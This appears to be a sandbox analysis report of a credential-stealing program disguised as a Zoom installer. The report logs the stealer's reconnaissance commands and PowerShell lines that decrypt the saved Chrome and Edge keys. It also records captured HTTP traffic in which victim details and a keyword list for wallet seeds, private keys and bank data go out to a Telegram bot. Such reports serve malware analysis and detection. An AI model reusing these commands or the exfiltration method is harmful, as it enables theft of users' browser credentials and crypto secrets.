                                                                                2024-10-29 13:10:20 UTC956OUTData Raw: 63 68 61 74 5f 69 64 3d 36 38 34 33 32 31 32 35 31 34 26 70 61 72 73 65 5f 6d 6f 64 65 3d 48 54 4d 4c 26 74 65 78 74 3d 25 30 41 25 46 30 25 39 46 25 38 43 25 39 30 2b 25 33 43 62 25 33 45 49 50 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 25 30 41 25 46 30 25 39 46 25 38 46 25 42 33 2b 25 33 43 62 25 33 45 43 6f 75 6e 74 72 79 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 55 6e 69 74 65 64 2b 53 74 61 74 65 73 25 30 41 25 46 30 25 39 46 25 39 32 25 42 42 2b 25 33 43 62 25 33 45 48 6f 73 74 6e 61 6d 65 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 33 37 36 34 38 33 25 30 41 25 46 30 25 39 46 25 39 36 25 41 35 2b 25 33 43 62 25 33 45 50 43 2b 54 79 70 65 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 4d 69 63 72 6f 73 6f 66 74 2b
                                                                                Data Ascii: chat_id=6843212514&parse_mode=HTML&text=%0A%F0%9F%8C%90+%3Cb%3EIP%3A%3C%2Fb%3E+173.254.250.72%0A%F0%9F%8F%B3+%3Cb%3ECountry%3A%3C%2Fb%3E+United+States%0A%F0%9F%92%BB+%3Cb%3EHostname%3A%3C%2Fb%3E+376483%0A%F0%9F%96%A5+%3Cb%3EPC+Type%3A%3C%2Fb%3E+Microsoft+
                                                                                2024-10-29 13:10:20 UTC776OUTData Raw: 6d 6f 2b 63 6f 6d 70 74 65 2b 74 6f 6b 65 6e 2b 62 61 63 6b 75 70 2b 73 65 63 72 65 74 2b 73 65 65 64 2b 6d 6e 65 6d 6f 6e 69 63 2b 6d 65 6d 6f 72 69 63 2b 70 72 69 76 61 74 65 2b 6b 65 79 2b 70 61 73 73 70 68 72 61 73 65 2b 70 61 73 73 2b 70 68 72 61 73 65 2b 73 74 65 61 6c 2b 62 61 6e 6b 2b 69 6e 66 6f 2b 63 61 73 69 6e 6f 2b 70 72 76 2b 70 72 69 76 25 43 33 25 41 39 2b 70 72 69 76 65 2b 74 65 6c 65 67 72 61 6d 2b 69 64 65 6e 74 69 66 69 61 6e 74 2b 69 64 65 6e 74 69 66 69 61 6e 74 73 2b 70 65 72 73 6f 6e 6e 65 6c 2b 74 72 61 64 69 6e 67 2b 62 69 74 63 6f 69 6e 2b 73 61 75 76 65 67 61 72 64 65 2b 66 75 6e 64 73 2b 72 65 63 75 70 2b 6e 6f 74 65 25 35 44 25 30 41 25 30 41 25 46 30 25 39 46 25 39 34 25 38 44 2b 25 33 43 62 25 33 45 46 6f 75 6e 64 2b 31 2b
                                                                                Data Ascii: mo+compte+token+backup+secret+seed+mnemonic+memoric+private+key+passphrase+pass+phrase+steal+bank+info+casino+prv+priv%C3%A9+prive+telegram+identifiant+identifiants+personnel+trading+bitcoin+sauvegarde+funds+recup+note%5D%0A%0A%F0%9F%94%8D+%3Cb%3EFound+1+
                                                                                2024-10-29 13:10:20 UTC389INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 29 Oct 2024 13:10:20 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 2330
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2024-10-29 13:10:20 UTC2330INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 37 36 32 38 32 32 35 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 63 68 61 74 62 6f 74 33 35 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 66 72 77 65 67 77 65 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 34 33 32 31 32 35 31 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 78 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 61 6c 5f 78 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 32 30 37 34 32 30 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 63 5c 75 64 66 31 30 20 49 50 3a 20 31 37 33 2e 32
                                                                                Data Ascii: {"ok":true,"result":{"message_id":79,"from":{"id":7576282251,"is_bot":true,"first_name":"chatbot355","username":"frwegwebot"},"chat":{"id":6843212514,"first_name":"x1","username":"real_x1","type":"private"},"date":1730207420,"text":"\ud83c\udf10 IP: 173.2


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:09:09:13
                                                                                Start date:29/10/2024
                                                                                Path:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\ZoomInstaller.exe"
                                                                                Imagebase:0x7ff6c39a0000
                                                                                File size:22'207'488 bytes
                                                                                MD5 hash:806A6CCCE380785FAA45512CE603C580
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:09:09:14
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:wmic path win32_videocontroller get caption
                                                                                Imagebase:0x7ff6db670000
                                                                                File size:576'000 bytes
                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:09:09:14
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:09:09:15
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:tasklist
                                                                                Imagebase:0x7ff7a9600000
                                                                                File size:106'496 bytes
                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:09:09:15
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:09:09:16
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:wmic os get Caption
                                                                                Imagebase:0x7ff6db670000
                                                                                File size:576'000 bytes
                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:09:09:16
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:8
                                                                                Start time:09:09:17
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:wmic os get Version
                                                                                Imagebase:0x7ff6db670000
                                                                                File size:576'000 bytes
                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:9
                                                                                Start time:09:09:17
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:10
                                                                                Start time:09:09:18
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:11
                                                                                Start time:09:09:18
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:13
                                                                                Start time:09:09:30
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:14
                                                                                Start time:09:09:30
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:15
                                                                                Start time:09:09:41
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:tasklist
                                                                                Imagebase:0x7ff7a9600000
                                                                                File size:106'496 bytes
                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:16
                                                                                Start time:09:09:41
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:17
                                                                                Start time:09:09:42
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:18
                                                                                Start time:09:09:42
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:20
                                                                                Start time:09:09:56
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:21
                                                                                Start time:09:09:56
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:3.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:100%
                                                                                  Total number of Nodes:4
                                                                                  Total number of Limit Nodes:0
                                                                                  execution_graph 1564 7ffd347652ae 1565 7ffd347652ca 1564->1565 1566 7ffd347653c7 CryptUnprotectData 1565->1566 1567 7ffd34765443 1566->1567

                                                                                  Executed Functions

                                                                                  Function 00007FFD347652AE Relevance: 1.7, APIs: 1, Instructions: 227encryptionCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.2568234990.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_7ffd34760000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptDataUnprotect
                                                                                  • String ID:
                                                                                  • API String ID: 834300711-0
                                                                                  • Opcode ID: a13397314045feb5e0b310fcb46c1bdb694703c78a46ddce50ccbf772ecfb89d
                                                                                  • Instruction ID: 21e4f5ae22129ed35392ffa30cb2fb32f4c901c0d3776603d688ba61f098e3a2
                                                                                  • Opcode Fuzzy Hash: a13397314045feb5e0b310fcb46c1bdb694703c78a46ddce50ccbf772ecfb89d
                                                                                  • Instruction Fuzzy Hash: 18514B70A1CA489FD758EB5C98166B97BE1FF9A310F00427EE44DC3293CE28AC5587D2

                                                                                  Non-executed Functions

                                                                                  Function 00007FFD34763EF8 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 94 7ffd34763ef8 95 7ffd34763efd-7ffd34763f19 94->95 98 7ffd34763f1d-7ffd34763f2a 95->98 100 7ffd34763f2d-7ffd34763f40 98->100 103 7ffd34763f42-7ffd34763f61 100->103 104 7ffd34763fb3-7ffd34763fd1 100->104 103->95 115 7ffd34763f63-7ffd34763f6b 103->115 110 7ffd34763fd3-7ffd34763fd9 104->110 111 7ffd34763f6d-7ffd34763f81 104->111 116 7ffd34763fdf-7ffd34763ff1 110->116 117 7ffd34763fdb-7ffd34763fde 110->117 111->98 118 7ffd34763f83-7ffd34763f89 111->118 115->111 122 7ffd34763f8d-7ffd34763f91 116->122 125 7ffd34763ff3-7ffd34763ff9 116->125 117->116 118->122 122->100 124 7ffd34763f93-7ffd34763faf 122->124 124->104
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.2568234990.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_7ffd34760000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4
                                                                                  • API String ID: 0-4088798008
                                                                                  • Opcode ID: 6b2196b435f0a5fb0aa0599f62aced46a11abbea498301e1d558c00f0af69733
                                                                                  • Instruction ID: 516c919cd7b897a1b7967de071d761daeeb4fafc1b33297ea120327df1efa8f1
                                                                                  • Opcode Fuzzy Hash: 6b2196b435f0a5fb0aa0599f62aced46a11abbea498301e1d558c00f0af69733
                                                                                  • Instruction Fuzzy Hash: 87415396B0D6C29AE652422C58FA1E93FB5DF53334F0904BBC6D4CA193AD1D280BE395
                                                                                  Function 00007FFD34762688 Relevance: .2, Instructions: 223COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.2568234990.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_7ffd34760000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e1a249fc81be6c8ab82fc12d6e1fd305472db9ae1f11631fd57eb215fc7ffca
                                                                                  • Instruction ID: ba5b58f151e1dbf2cc7944f68eb76eb854985747e880c79e33f3911a32d91fa3
                                                                                  • Opcode Fuzzy Hash: 3e1a249fc81be6c8ab82fc12d6e1fd305472db9ae1f11631fd57eb215fc7ffca
                                                                                  • Instruction Fuzzy Hash: B661B597A0D7D35FE7A2666C5CB64EA3B999F5323470900B7D688CE0D3DD0C680B6292
                                                                                  Function 00007FFD34763B9D Relevance: .2, Instructions: 165COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.2568234990.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_7ffd34760000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 215b5fe4c86b3938b4a547d82193172ba6bc88d588a1c477a7a204f65a4b8357
                                                                                  • Instruction ID: 8ee7ef5dae6af53f94d72ef89ea3a915985fab35a09ac1f7f2ee1e9cb1fda043
                                                                                  • Opcode Fuzzy Hash: 215b5fe4c86b3938b4a547d82193172ba6bc88d588a1c477a7a204f65a4b8357
                                                                                  • Instruction Fuzzy Hash: DD5150A6B0E2D29EE713966D58B60E93FA59F5323470D00F7D6C4CB0D3D90D281BE2A1

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.3%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:3
                                                                                  Total number of Limit Nodes:0
                                                                                  execution_graph 1322 7ffd3476517d 1323 7ffd347651bf CryptUnprotectData 1322->1323 1325 7ffd34765273 1323->1325

                                                                                  Executed Functions

                                                                                  Function 00007FFD3476517D Relevance: 1.6, APIs: 1, Instructions: 145encryptionCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 7ffd3476517d-7ffd34765271 CryptUnprotectData 3 7ffd34765273 0->3 4 7ffd34765279-7ffd347652a8 0->4 3->4
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000014.00000002.2734647411.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_20_2_7ffd34760000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptDataUnprotect
                                                                                  • String ID:
                                                                                  • API String ID: 834300711-0
                                                                                  • Opcode ID: 0b3426d785680fddf2b76e74b0e7fb72b1c0620f1a1c7cc42435d1d11a60aabf
                                                                                  • Instruction ID: d5389d8d535106ad4deac35f6ca11784a5104847ae0f01635d40e971af4ba175
                                                                                  • Opcode Fuzzy Hash: 0b3426d785680fddf2b76e74b0e7fb72b1c0620f1a1c7cc42435d1d11a60aabf
                                                                                  • Instruction Fuzzy Hash: A7412A3090CB884FDB59DB68D8456A97FF1EF5A320F0442AFE489C3153C668A856CBC2